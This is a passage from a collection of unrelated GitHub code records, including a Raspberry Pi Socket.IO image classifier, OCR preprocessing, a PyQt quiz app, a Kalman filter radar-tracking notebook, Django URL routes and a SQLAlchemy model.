f.close()\n #print('Number of categories:', len(dict))\n\n#Load inputsize\nwith open(path_to_networks + 'inputsize.txt', 'r') as f:\n reqsize = int(f.readline().split('\\n')[0])\n\n# Load preprocessing data\nmean = 128\nstd = 1 / 128\n\ndevices = mvnc.EnumerateDevices()\nglobal camera\n\ndef set_default(obj):\n if isinstance(obj, set):\n return list(obj)\n raise TypeError\n\ndef on_connect():\n print('connect')\n\ndef on_disconnect():\n print('disconnect')\n\ndef on_reconnect():\n print('reconnect')\n\n\ndef load_devices():\n global devices\n global device\n global graphfile\n global graph\n global camera\n if len(devices) == 0:\n print('No devices found')\n quit()\n device = mvnc.Device(devices[0])\n device.OpenDevice()\n graph = device.AllocateGraph(graphfile)\n print('NCS device was opened.')\n #socketIO.emit('event_B')\n socketIO.emit('new message', 'NCS device was opened.')\n camera = picamera.PiCamera()\n camera.rotation = 180\n\ndef Capture():\n stream = picamera.array.PiRGBArray(camera)\n camera.capture(stream, format = 'bgr')\n frame = stream.array\n return frame\n\ndef ImageRead():\n return cv2.imread(\"./test3.jpg\")\n\ndef infer():\n global graph\n image = Capture()\n img = numpy.array(image).astype(numpy.float32)\n dx, dy, dz = img.shape\n delta = float(abs(dy - dx))\n if dx > dy: # crop the x dimension\n img = img[int(0.5 * delta):dx - int(0.5 * delta), 0:dy]\n else:\n img = img[0:dx, int(0.5 * delta):dy - int(0.5 * delta)]\n img = cv2.resize(img, (reqsize, reqsize))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n for i in range(3):\n img[:, :, i] = (img[:, :, i] - mean) * std\n graph.LoadTensor(img.astype(numpy.float16), 'user object')\n output, userobj = graph.GetResult()\n top_inds = output.argsort()[::-1][:5]\n #print(''.join(['*' for i in range(79)]))\n result = []\n for i in range(5):\n if output[top_inds[i]] <= 0.001 or categories[top_inds[i]] not in dict:\n break\n # print(top_inds[i], categories[top_inds[i]], output[top_inds[i]])\n print(categories[top_inds[i]])\n result.append(categories[top_inds[i]])\n socketIO.emit('new message', result)\n #print(''.join(['*' for i in range(79)]))\n\ndef exit():\n global device\n global camera\n camera.close()\n device.CloseDevice()\n print(\"NCS device is closed.\")\n socketIO.emit('new message', \"NCS device is closed.\")\n\n\n\n\nsocketIO = SocketIO('localhost', 3000, LoggingNamespace)\nsocketIO.on('connect', on_connect)\nsocketIO.on('disconnect', on_disconnect)\nsocketIO.on('reconnect', on_reconnect)\n\n\nwhile(1):\n\n socketIO.on('start', load_devices)\n # Listen\n socketIO.on('infer', infer)\n socketIO.wait(seconds=1)\n\n # Stop listening\n #socketIO.off('infer')\n #socketIO.emit('event_B')\n #socketIO.wait(seconds=1)\n\n # Listen only once\n socketIO.on('exit', exit)\n socketIO.wait(seconds=1)\n","repo_name":"WuXinyang2012/RaspberryPI_nodejs_socketIO_detector","sub_path":"client_sio.py","file_name":"client_sio.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1453047516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: sabari\r\n\"\"\"\r\n\r\nimport cv2\r\nfrom skimage.filters import threshold_sauvola\r\nimport numpy as np\r\n\r\n\r\nclass preprocessing():\r\n\r\n def sauvola_thresholding(grayImage_,window_size=15):\r\n \r\n \"\"\"\"\r\n Sauvola thresholds are local thresholding techniques that are \r\n useful for images where the background is not uniform, especially for text recognition\r\n \r\n grayImage--- Input image should be in 2-Dimension Gray Scale format\r\n window_size --- It represents the filter window size \r\n \r\n \"\"\"\r\n thresh_sauvolavalue = threshold_sauvola(grayImage_, window_size=window_size)\r\n \r\n thresholdImage_=(grayImage_>thresh_sauvolavalue)\r\n \r\n return thresholdImage_\r\n \r\n \r\n def remove_Lines(binaryImage_,horz_size=12,vert_size=15):\r\n \"\"\"\r\n Removing the horizontal and vertical lines in the image\r\n \r\n binaryImage_--- Image should be in binray format\r\n horz_size -- It represents the Minimum size of horizantal line need to be removed from the image\r\n vert_size -- It represents the Minimum size of vertical line need to be removed from the image\r\n \r\n \"\"\"\r\n horz_size=round(binaryImage_.shape[0]*0.075)\r\n vert_size=round(binaryImage_.shape[1]*0.09)\r\n horizontal_kernel=np.ones((1,horz_size),np.uint8)\r\n vertical_kernel=np.ones((vert_size,1),np.uint8)\r\n hz_closing = cv2.morphologyEx(binaryImage_, cv2.MORPH_CLOSE, horizontal_kernel)\r\n ver_closing = cv2.morphologyEx(binaryImage_, cv2.MORPH_CLOSE, vertical_kernel)\r\n\r\n Lines = hz_closing&ver_closing\r\n LinesRemoved= binaryImage_| (~Lines)\r\n return np.uint8(LinesRemoved)\r\n\r\n \r\n \r\n \r\n \r\n\"\"\"\r\nthresholdImage=preprocessing.sauvola_thresholding(grayImage)\r\n\r\nremoveLines=preprocessing.remove_Lines(np.uint8(thresholdImage))\r\n\r\n\"\"\"\r\n\r\n ## remove lines ###\r\n\r\n\r\n","repo_name":"dsabarinathan/OpenDoc","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25652497240","text":"import spacy\r\nimport json\r\nnlp = spacy.load(\"en_core_web_sm\")\r\ntext = '''That day, Yakufu, a 43-year-old ethnic Uyghur, had been freed from a Chinese detention camp and allowed to return home to her three teenage children and aunt and uncle in Xinjiang, western China. It was the first time she'd seen her family in more than 16 months.\r\n\r\n'''\r\n\r\ndoc = nlp(text)\r\n\r\ntag = ['GPE','ORG','PERSON','PERCENT','NORP']\r\nres = {\"article\": text , \"answers\":{\"ans_detail\":[]}}\r\nfor ent in doc.ents:\r\n print(ent.text, ent.start_char, ent.end_char, ent.label_)\r\n if ent.label_ in tag:\r\n tmp = {\"tag\" : ent.text, \"start_at\" : ent.start_char, \"end_at\" : ent.end_char}\r\n res[\"answers\"][\"ans_detail\"].append(tmp)\r\n\r\nprint(json.dumps(res))","repo_name":"Minniemu/BERT-for-token-Classification","sub_path":"Spacy/spacy_test.py","file_name":"spacy_test.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43979469864","text":"# nubBy :: (a -> a -> Bool) -> [a] -> [a]\ndef nubBy(p, xs):\n def go(xs):\n if xs:\n x = xs[0]\n return [x] + go(\n list([y for y in xs[1:] if not p(x, y)])\n )\n else:\n return []\n return go(xs)\n","repo_name":"ethansaxenian/RosettaDecode","sub_path":"lang/Python/remove-duplicate-elements-8.py","file_name":"remove-duplicate-elements-8.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18663183163","text":"import unittest\nfrom src.day2.dive import Dive\n\nDIVE_INSTRUCTION = [['forward', 5], ['down', 5], ['forward', 8],\n ['up', 3], ['down', 8], ['forward', 2]]\n\n\nclass TestDive(unittest.TestCase):\n def test_should_return_horizontal_position_after_dive(self):\n horizontal_position = Dive.get_horizontal_position(DIVE_INSTRUCTION)\n self.assertEqual(horizontal_position, 15)\n\n def test_should_return_final_depth_after_dive(self):\n final_depth = Dive.get_final_depth(DIVE_INSTRUCTION)\n self.assertEqual(final_depth, 10)\n\n def test_should_return_final_depth_considering_aim_value(self):\n depth = Dive. \\\n get_horizontal_and_depth_position_with_aim(DIVE_INSTRUCTION)[1]\n self.assertEqual(depth, 60)\n","repo_name":"mram0s/adventOfCode2021","sub_path":"test/day2/testDive.py","file_name":"testDive.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040749434","text":"from typing import Mapping, Optional, Sequence\n\nimport numpy as np\n\nfrom starfish.core.morphology.binary_mask import BinaryMaskCollection\nfrom starfish.core.morphology.util import _ticks_equal\nfrom starfish.core.types import ArrayLike, Axes, Coordinates, Number\nfrom ._base import MergeAlgorithm\n\n\nclass SimpleMerge(MergeAlgorithm):\n \"\"\"Merge multiple binary mask collections together. This implementation requires that all\n the binary mask collections have the same pixel and physical ticks.\"\"\"\n\n def run(\n self,\n binary_mask_collections: Sequence[BinaryMaskCollection],\n *args,\n **kwargs\n ) -> BinaryMaskCollection:\n \"\"\"\n Parameters\n ----------\n binary_mask_collections : Sequence[BinaryMaskCollection]\n A sequence of binary mask collections with identical pixel and physical ticks.\n\n Returns\n -------\n BinaryMaskCollection\n A binary mask collection with the input mask collections merged together.\n \"\"\"\n pixel_ticks: Optional[Mapping[Axes, ArrayLike[int]]] = None\n physical_ticks: Optional[Mapping[Coordinates, ArrayLike[Number]]] = None\n\n # validate that they have the same pixel/physical ticks.\n for binary_mask_collection in binary_mask_collections:\n pixel_ticks = pixel_ticks or binary_mask_collection._pixel_ticks\n physical_ticks = physical_ticks or binary_mask_collection._physical_ticks\n\n if not _ticks_equal(pixel_ticks, binary_mask_collection._pixel_ticks):\n raise ValueError(\"not all masks have the same pixel ticks\")\n if not _ticks_equal(physical_ticks, binary_mask_collection._physical_ticks):\n raise ValueError(\"not all masks have the same physical ticks\")\n\n # gather up all the uncropped masks.\n all_uncropped_masks = [\n np.asarray(binary_mask_collection.uncropped_mask(ix))\n for binary_mask_collection in binary_mask_collections\n for ix in range(len(binary_mask_collection))\n ]\n\n assert pixel_ticks is not None\n assert physical_ticks is not None\n\n return BinaryMaskCollection.from_binary_arrays_and_ticks(\n all_uncropped_masks,\n pixel_ticks,\n physical_ticks,\n None,\n )\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/morphology/Merge/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"6593779996","text":"from PyQt6.QtWidgets import *\r\nfrom PyQt6.QtCore import Qt\r\nclass TestWindow(QMainWindow):\r\n spisoc = []\r\n def __init__(self):\r\n super().__init__()\r\n self.setFixedSize(500,200)\r\n\r\n self.name = QLabel(\"Введите свое Имя и Фамилию\")\r\n self.edit = QLineEdit()\r\n self.course = QLabel(\"Введите Группу\")\r\n self.edit1 = QLineEdit()\r\n box = QVBoxLayout()\r\n wid = QWidget()\r\n wid.setLayout(box)\r\n box.addWidget(self.name)\r\n box.addWidget(self.edit)\r\n box.addWidget(self.course)\r\n\r\n box.addWidget(self.edit1)\r\n\r\n lbl1 = QLabel(\"Какой тип автомобиля вы предпочитаете?\")\r\n self.rb1 = QRadioButton(text=\"Седан\")\r\n self.rb2 = QRadioButton(text=\"Хэтчбек\")\r\n self.rb3 = QRadioButton(text=\"Внедорожник\")\r\n self.rb4 = QRadioButton(text=\"Купе\")\r\n vbox = QVBoxLayout()\r\n widget = QWidget()\r\n widget.setLayout(vbox)\r\n vbox.addWidget(lbl1)\r\n vbox.addWidget(self.rb1)\r\n vbox.addWidget(self.rb2)\r\n vbox.addWidget(self.rb3)\r\n vbox.addWidget(self.rb4)\r\n\r\n lbl2 = QLabel(\"Какой бюджет у вас на автомобиль?\")\r\n self.rb1_1 = QRadioButton(text=\"До 300 000 руб\")\r\n self.rb2_1 = QRadioButton(text=\"300 000 руб - 700 000 руб\")\r\n self.rb3_1 = QRadioButton(text=\"700 000 руб - 1 000 000 руб\")\r\n self.rb4_1 = QRadioButton(text=\"Более 1 000 000 руб\")\r\n vbox_2 = QVBoxLayout()\r\n widget2 = QWidget()\r\n widget2.setLayout(vbox_2)\r\n vbox_2.addWidget(lbl2)\r\n vbox_2.addWidget(self.rb1_1)\r\n vbox_2.addWidget(self.rb2_1)\r\n vbox_2.addWidget(self.rb3_1)\r\n vbox_2.addWidget(self.rb4_1)\r\n\r\n\r\n lbl3 = QLabel(\"Какие опции вам необходимы?\")\r\n self.rb1_2 = QRadioButton(text=\"Кондиционер\")\r\n self.rb2_2 = QRadioButton(text=\"Навигационная система\")\r\n self.rb3_2 = QRadioButton(text=\"Камера заднего вида\")\r\n self.rb4_2 = QRadioButton(text= \"Круиз-контроль\")\r\n vbox_3 = QVBoxLayout()\r\n widget3 = QWidget()\r\n widget3.setLayout(vbox_3)\r\n vbox_3.addWidget(lbl3)\r\n vbox_3.addWidget(self.rb1_2)\r\n vbox_3.addWidget(self.rb2_2)\r\n vbox_3.addWidget(self.rb3_2)\r\n vbox_3.addWidget(self.rb4_2)\r\n\r\n lbl7 = QLabel(\"Результаты теста:\")\r\n self.v6 = QLabel(self.rb1_2.text())\r\n self.v2 = QLabel()\r\n self.v3 = QLabel()\r\n self.v4 = QLabel()\r\n self.v5 = QLabel()\r\n self.res = QLabel()\r\n vbox7 = QVBoxLayout()\r\n widget7 = QWidget()\r\n widget7.setLayout(vbox7)\r\n vbox7.addWidget(lbl7)\r\n vbox7.addWidget(self.v6)\r\n vbox7.addWidget(self.v2)\r\n vbox7.addWidget(self.v3)\r\n vbox7.addWidget(self.v4)\r\n vbox7.addWidget(self.v5)\r\n vbox7.addWidget(self.res)\r\n btn_save = QPushButton(\"Сохранить\")\r\n btn_save.clicked.connect(self.save)\r\n vbox7.addWidget(btn_save)\r\n\r\n\r\n pagelayout = QVBoxLayout()\r\n self.button_layout = QHBoxLayout()\r\n self.stacklayout = QStackedLayout()\r\n\r\n pagelayout.addLayout(self.stacklayout)\r\n pagelayout.addLayout(self.button_layout)\r\n\r\n self.btnb = QPushButton(\"back\")\r\n self.btn = QPushButton(\"next\")\r\n\r\n self.btnb.clicked.connect(self.activate_tab_b)\r\n self.btn.clicked.connect(self.activate_tab_v)\r\n\r\n self.stacklayout.addWidget(wid)\r\n self.button_layout.addWidget(self.btnb)\r\n self.button_layout.addWidget(self.btn)\r\n\r\n self.stacklayout.addWidget(widget)\r\n\r\n self.stacklayout.addWidget(widget2)\r\n\r\n self.stacklayout.addWidget(widget3)\r\n\r\n # self.stacklayout.addWidget(widget6)\r\n\r\n self.stacklayout.addWidget(widget7)\r\n\r\n\r\n\r\n widget = QWidget()\r\n widget.setLayout(pagelayout)\r\n self.setCentralWidget(widget)\r\n\r\n with open(\"style.css\", \"r\") as css:\r\n self.setStyleSheet(css.read())\r\n\r\n def activate_tab_v(self):\r\n self.stacklayout.setCurrentIndex(self.stacklayout.currentIndex()+1)\r\n\r\n if self.rb1.isChecked():\r\n self.spisoc.append(self.rb1.text())\r\n\r\n if self.rb2.isChecked():\r\n self.spisoc.append(self.rb2.text())\r\n \r\n if self.rb3.isChecked():\r\n self.spisoc.append(self.rb3.text())\r\n\r\n if self.rb4.isChecked():\r\n self.spisoc.append(self.rb4.text())\r\n\r\n if self.rb1_1.isChecked():\r\n self.spisoc.append(self.rb1_1.text())\r\n\r\n if self.rb2_1.isChecked():\r\n self.spisoc.append(self.rb2_1.text())\r\n \r\n if self.rb3_1.isChecked():\r\n self.spisoc.append(self.rb3_1.text())\r\n\r\n if self.rb4_1.isChecked():\r\n self.spisoc.append(self.rb4_1.text())\r\n\r\n if self.rb1_2.isChecked():\r\n self.spisoc.append(self.rb1_2.text())\r\n\r\n if self.rb2_2.isChecked():\r\n self.spisoc.append(self.rb2_2.text())\r\n\r\n if self.rb3_2.isChecked():\r\n self.spisoc.append(self.rb3_2.text())\r\n\r\n if self.rb4_2.isChecked():\r\n self.spisoc.append(self.rb4_2.text())\r\n\r\n def activate_tab_b(self):\r\n self.stacklayout.setCurrentIndex(self.stacklayout.currentIndex()-1)\r\n\r\n def result(self):\r\n result = \"Результаты:\\n\"\r\n for i in range(self.activate_tab_v):\r\n result += f\"Вопрос {i+1}: {self.spisoc[i]['question']}\\n\"\r\n result += f\"Ответ: {self.spisoc[i]}\\n\\n\"\r\n QMessageBox.information(self, \"Результаты\", result)\r\n\r\n # self.setFixedSize(500, 300)\r\n # self.res.setText(f\"Ваш результат:{self.e}\")\r\n def save(self):\r\n info = f\"Фамилия и Имя:{self.edit.text()} \\n\"\r\n cour = f\"Группа:{self.edit1.text()} \\n\"\r\n txt = f\"Ваш результат:{self.v6.text()} \\n\"\r\n txt1 = f\"Ваш результат:{self.v2.text()} \\n\"\r\n txt2 = f\"Ваш результат:{self.v3.text()} \\n\"\r\n txt5 = f\"Ваш результат:{self.e} \\n\"\r\n\r\n with open(\"results.txt\", \"w\", encoding=\"utf-8\") as f:\r\n f.write(info)\r\n f.write(cour)\r\n f.write(txt)\r\n f.write(txt1)\r\n f.write(txt2)\r\n f.write(txt5)\r\n","repo_name":"victorkluev5/practic","sub_path":"window/yjdsq afqk/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15837733658","text":"class ListNode:\n def __init__(self, data=0, next=None):\n self.data = data\n self.next = next\n\n\ndef print_linked_list_in_reverse(head):\n nodes = []\n while head:\n nodes.append(head.data)\n head = head.next\n while nodes:\n print(nodes.pop())\n\n","repo_name":"michaelmontelli/EPIJudge","sub_path":"epi_judge_python/completed/chapter8-stacks_and_queues/8.0/print_linked_list_in_reverse.py","file_name":"print_linked_list_in_reverse.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"35448689171","text":"'''JUST AN EXAMPLE OF HOW TO SHOW DIFFERENT CURSORS!!'''\n\nfrom tkinter import *\nroot=Tk()\ncursors =[\n \"arrow\",\n \"circle\",\n \"clock\",\n \"cross\",\n \"dotbox\",\n \"exchange\",\n \"fleur\",\n \"heart\",\n \"man\",\n \"mouse\",\n \"pirate\",\n \"plus\",\n \"shuttle\",\n \"sizing\",\n \"spider\",\n \"spraycan\",\n \"star\",\n \"target\",\n \"tcross\",\n \"trek\"\n]\n \n \n \n# Iterate through all cursors\nfor cursor in cursors:\n Button(root,text=cursor,cursor=cursor).pack()\n \n \n","repo_name":"isahilchanna/Python-Programs","sub_path":"cursors.py","file_name":"cursors.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2836961062","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n # asking for a specific cardid\n\n url(r'^users/([-\\w\\-]+)/$', views.detail, name='detail'),\n url(r'^devices/([-\\w\\-]+)/$', views.devices, name='devices'),\n url(r'^create/$', views.create, name='create'),\n url(r'newUser/$', views.newUser, name='newUser'),\n url(r'^strikeUser/$', views.strikeUser, name='strikeUser'),\n]\n","repo_name":"fau-fablab/uacs-server","sub_path":"myApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11639464200","text":"solmax = 3\nrang = 1000\n\nfor p in range(rang // 4 * 2, rang + 1, 2):\n solutions = 0\n for a in range(2, int(p / 3.4142) + 1):\n if p * (p - 2 * a) % (2 * (p - a)) == 0:\n solutions += 1\n if solutions > solmax:\n solmax = solutions\n maxp = p\n\nprint(maxp)\n","repo_name":"ozturkemre/EulerProject","sub_path":"039-IntegerRightTriangles.py","file_name":"039-IntegerRightTriangles.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75022832426","text":"\n# coding: utf-8\n\n# ## SKOLTECH, Experimental Data Processing\n\n# ## Evgenii Safronov, Mikhail Kurenkov, Taras Melnik\n\n# In[20]:\n\nimport numpy as np\nimport scipy as sp\nfrom matplotlib import pyplot as plt\nfrom numpy.linalg import inv\nimport matplotlib as mplb\nfrom matplotlib.font_manager import FontProperties\nget_ipython().magic('matplotlib inline')\nfrom numpy.random import normal\nfrom mpl_toolkits.mplot3d import Axes3D\nmplb.rc('xtick', labelsize=5) \nmplb.rc('ytick', labelsize=5) \nimport math\n\n\n# In[53]:\n\ndef kalman(X_0, P_0, z, T, h, R, Q, dh, start_step = 0):\n N = len(z)\n X = np.zeros((len(z),*(X_0.shape)))\n P = np.zeros((len(z),*(P_0.shape)))\n Xp= np.zeros_like(X)\n for i in range(N):\n #Prediction\n Xp[i] = X[i] = T.dot(X[i-1] if i > 0 else X_0)\n P[i] = T.dot((P[i-1] if i > 0 else P_0).dot(T.transpose())) + Q\n #Filtration\n if (i >= start_step):\n tmp1 = inv(dh[i](Xp[i]).dot(P[i].dot(dh[i](Xp[i]).transpose())) + R[i])\n tmp2 = dh[i](Xp[i]).transpose().dot(tmp1)\n K = P[i].dot(tmp2)\n X[i] = Xp[i] + K.dot(z[i] - h[i](Xp[i]))\n P[i] = (np.identity(X_0.shape[0]) - K.dot(dh[i](Xp[i]))).dot(P[i])\n return X, Xp\n\ndef generate_acc_trajectory(sigma_a_2, sigma_n_2, N, x_0, v_0, t, a_bias = 0):\n if sigma_a_2 == 0:\n a = np.zeros(N) + a_bias\n else: \n a = np.random.normal(0, sigma_a_2 ** 0.5, N) + a_bias\n v = np.ones(N) * v_0\n x = np.ones(N) * x_0\n for i, a_i in enumerate(a[:-1]):\n v[i+1] = v[i] + a_i*t\n dx = (v * t + a * t * t / 2)\n for i, dx_i in enumerate(dx[:-1]):\n x[i+1] = x[i] + dx_i\n #v2 = np.ones(N) * v_0 + a.dot(np.triu(np.ones((N, N)), 1)) * t\n #x2 = np.ones(N) * x_0 + (v2 * t + a * t * t / 2).dot(np.triu(np.ones((N, N)), 1))\n z = x + np.random.normal(0, sigma_n_2 ** 0.5, N)\n return x, z\n\ndef convert_to_polar(X):\n x = X[:,0,0]\n y = X[:,2,0]\n D = (x**2 + y**2) ** 0.5\n b = np.arctan(x / y)\n return b, D\n\n\n# # Generate a true trajectory\n\n# In[6]:\n\nN = 500\nt = 2\nx_0 = 1000\ny_0 = 1000\nsigma_a_2 = 0.3 ** 2\nv_x = 100\nv_y = 100\n\nx, _ = generate_acc_trajectory(sigma_a_2, 1, N, x_0, v_x, t)\ny, _ = generate_acc_trajectory(sigma_a_2, 1, N, y_0, v_y, t)\n\n\n# # Generate also true values of range $D$ and azimut $\\beta$\n\n# In[7]:\n\nD = (x**2 + y**2) ** 0.5\nb = np.arctan(x / y)\n\n\n# In[8]:\n\nfig = plt.figure(figsize=(10, 10))\nax = fig.add_subplot(111, polar=True)\nax.set_title('True trajectory', fontsize = 20)\nax.plot(b, D, 'r', linewidth=2)\nax.xaxis.set_tick_params(labelsize=10)\nax.yaxis.set_tick_params(labelsize=10)\n\n\n# # Generate measurements $D^m$ and $\\beta^m$\n\n# In[32]:\n\nsigma_D = 50\nsigma_b = 0.004\nz = [np.zeros(1) for x in range(N)]\nfor i in range(0, N, 2):\n D_n = np.random.normal(0, sigma_D, 1)\n b_n = np.random.normal(0, sigma_b, 1)\n z[i] = np.array([D_n + D[i],b_n + b[i]])\n\n\n# # Generate more accurate measurements of azimuth \n\n# In[33]:\n\nsigma_b_add = 0.001\nfor i in range(1, N, 2):\n b_n = np.random.normal(0, sigma_b_add, 1)\n z[i] = np.array([b_n + b[i]])\n\n\n# # Initial conditions for Kalman filter algorithm\n\n# In[37]:\n\nx_1 = z[0][0, 0] * math.sin(z[0][1, 0])\nx_3 = z[2][0, 0] * math.sin(z[2][1, 0])\ny_1 = z[0][0, 0] * math.cos(z[0][1, 0])\ny_3 = z[2][0, 0] * math.cos(z[2][1, 0])\nX_0 = np.array([[x_3],[(x_3 - x_1) / 2 / t], [y_3],[(y_3 - y_1) / 2 / t]])\nP_0 = np.eye(4) * 10 ** 4\n\n\n# # Develop Kalman filter algorithm to estimate state vector\n\n# In[40]:\n\ndef h_1(X):\n x = X[0]\n y = X[2]\n H = np.zeros((2, 1))\n H[0] = (x ** 2 + y ** 2) ** 0.5\n H[1] = np.arctan(x / y)\n return H\n\ndef dh_1(X):\n x = X[0, 0]\n y = X[2, 0]\n dH = np.zeros((2, 4))\n dH[0, 0] = x / (x ** 2 + y ** 2) ** 0.5\n dH[0, 2] = y / (x ** 2 + y ** 2) ** 0.5\n dH[1, 0] = y / (x ** 2 + y ** 2)\n dH[1, 2] = - x / (x ** 2 + y ** 2)\n return dH\n\ndef h_2(X):\n x = X[0]\n y = X[2]\n H = np.zeros((1, 1))\n H[0] = np.arctan(x / y)\n return H\n\ndef dh_2(X):\n x = X[0, 0]\n y = X[2, 0]\n dH = np.zeros((1, 4))\n dH[0, 0] = y / (x ** 2 + y ** 2)\n dH[0, 2] = - x / (x ** 2 + y ** 2)\n return dH\n\nR_1 = np.array([[sigma_D ** 2, 0], [0, sigma_b ** 2]])\nR_2 = np.array([[sigma_b_add ** 2]])\n\n\n# In[45]:\n\nT = np.zeros((4, 4))\nT[0:2, 0:2] = np.array([[1, t], [0, 1]])\nT[2:4, 2:4] = np.array([[1, t], [0, 1]])\n\nG = np.zeros((4, 2)) \nG[0:2, 0:1] = np.array([[t ** 2 / 2], [t]])\nG[2:4, 1:2] = np.array([[t ** 2 / 2], [t]])\nQ = G.dot(G.transpose() * sigma_a_2)\n\n\ndh = list(range(N))\nh = list(range(N))\nR = list(range(N))\nfor i in range(0, N, 2):\n h[i] = h_1\n dh[i] = dh_1\n R[i] = R_1\n \nfor i in range(1, N, 2):\n h[i] = h_2\n dh[i] = dh_2\n R[i] = R_2\n\n\n# In[54]:\n\nX, Xp = kalman(X_0, P_0, z, T, h, R, Q, dh, 3)\n\n\n# In[74]:\n\nb_f, D_f = convert_to_polar(Xp)\nfig = plt.figure(figsize=(10, 10))\nax = fig.add_subplot(111, polar=True)\nax.set_title('Kalman trajectory', fontsize = 20)\nax.plot(b_f, D_f, 'r', linewidth=2)\nax.xaxis.set_tick_params(labelsize=10)\nax.yaxis.set_tick_params(labelsize=10)\n\n\n# # Run Kalman filter algorithm over $M=500$ runs\n\n# In[67]:\n\nM = 500\nerror_b_f = np.zeros((N, M))\nerror_D_f = np.zeros((N, M))\nerror_b_p = np.zeros((N, M))\nerror_D_p = np.zeros((N, M))\n\nfor i in range(M):\n x, _ = generate_acc_trajectory(sigma_a_2, 1, N, x_0, v_x, t)\n y, _ = generate_acc_trajectory(sigma_a_2, 1, N, y_0, v_y, t)\n \n D = (x**2 + y**2) ** 0.5\n b = np.arctan(x / y)\n z = [np.zeros(1) for x in range(N)]\n for j in range(0, N, 2):\n D_n = np.random.normal(0, sigma_D, 1)\n b_n = np.random.normal(0, sigma_b, 1)\n z[j] = np.array([D_n + D[j],b_n + b[j]])\n for j in range(1, N, 2):\n b_n = np.random.normal(0, sigma_b_add, 1)\n z[j] = np.array([b_n + b[j]])\n \n x_1 = z[0][0, 0] * math.sin(z[0][1, 0])\n x_3 = z[2][0, 0] * math.sin(z[2][1, 0])\n y_1 = z[0][0, 0] * math.cos(z[0][1, 0])\n y_3 = z[2][0, 0] * math.cos(z[2][1, 0])\n X_0 = np.array([[x_3],[(x_3 - x_1) / 2 / t], [y_3],[(y_3 - y_1) / 2 / t]])\n \n X, Xp = kalman(X_0, P_0, z, T, h, R, Q, dh, 3)\n \n b_f, D_f = convert_to_polar(X)\n b_p, D_p = convert_to_polar(Xp)\n \n error_b_f[:,i] = (b - b_f) ** 2\n error_D_f[:,i] = (D - D_f) ** 2\n error_b_p[:,i] = (b - b_p) ** 2\n error_D_p[:,i] = (D - D_p) ** 2\n\n\n# In[73]:\n\nfig, ax = plt.subplots(2,1, figsize=(6,4), dpi = 600, sharex = True)\nax[0].set_title(r'Error $\\beta$', fontsize = 10)\nax[0].plot( (np.sum(error_b_f,axis=1)/(M-1))**0.5, label = 'filtration', linewidth=0.5)\nax[0].plot( (np.sum(error_b_p,axis=1)/(M-1))**0.5, label = 'prediction', linewidth=0.5)\nax[0].set_ylabel('magnitude', fontsize = 7)\nax[0].axhline(sigma_b, label = \"measurament error\", linestyle='--')\nax[0].axhline(sigma_b_add, label = \"acc measurament error\", color = 'r', linestyle='--')\nax[0].set_ylim((0, 0.005))\nax[0].legend(loc='upper right')\n\nax[1].set_title('Error D', fontsize = 10)\nax[1].plot( (np.sum(error_D_f,axis=1)/(M-1))**0.5, label = 'filtration', linewidth=0.5)\nax[1].plot( (np.sum(error_D_p,axis=1)/(M-1))**0.5, label = 'prediction', linewidth=0.5)\nax[1].set_xlabel('points', fontsize = 7)\nax[1].set_ylabel('magnitude', fontsize = 7)\nax[1].axhline(sigma_D, label = \"measurament error\", linestyle='--')\nax[1].set_ylim((0, 100))\nax[1].legend(loc='upper right');\n\n\n# ## One can see from this plot that measurement error (even more accurate measurement error) is times higher than true estimaiton error of filtration and prediction. Also there is an oscillation of Error D and Error b which corespond to different measurements. It can be due-to different accuracy of measurements on odd and even steps.\n\n# # Conclusion\n\n# ## Today we have learned extended Kalman filter with different sources of measurements\n\n# In[ ]:\n\n\n\n","repo_name":"EgorPristanskiy/ExpDataProcessing","sub_path":"Lab13/Lab13.py","file_name":"Lab13.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20776831896","text":"from . import StudentSubscription\nfrom .user import User\nfrom .. import db\n\n\nclass Student(User):\n __tablename__ = 'students'\n id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)\n exams = db.relationship('Exam',\n secondary='subscriptions',\n foreign_keys=[StudentSubscription.exam_id,\n StudentSubscription.student_id],\n backref='student')\n __mapper_args__ = {\n 'polymorphic_identity': 'student'\n }\n\n @classmethod\n def check_students_ids(cls, students_ids):\n \"\"\"Return if the provided students ids are valid\"\"\"\n return (Student\n .get_query()\n .filter(Student.id.in_(students_ids))\n .count() != 